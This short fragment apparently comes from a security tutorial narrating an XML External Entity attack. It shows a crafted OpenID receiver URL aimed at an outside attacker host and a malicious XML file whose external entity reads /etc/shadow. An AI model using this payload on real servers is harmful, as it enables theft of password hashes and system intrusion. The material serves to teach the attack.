XML External Entities

Next he crafts a URL to the social media site mentioning the URL of his malicious XML file.
/openid/receiver.php?provider_id=1010459756371&openid.op_endpoint=132.321.222.120
The hacker executing his attack.
malicious.xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xrds [
<!ENTITY passwords SYSTEM "file://etc/shadow">
]>
<xrds>
  &passwords;
</xrds>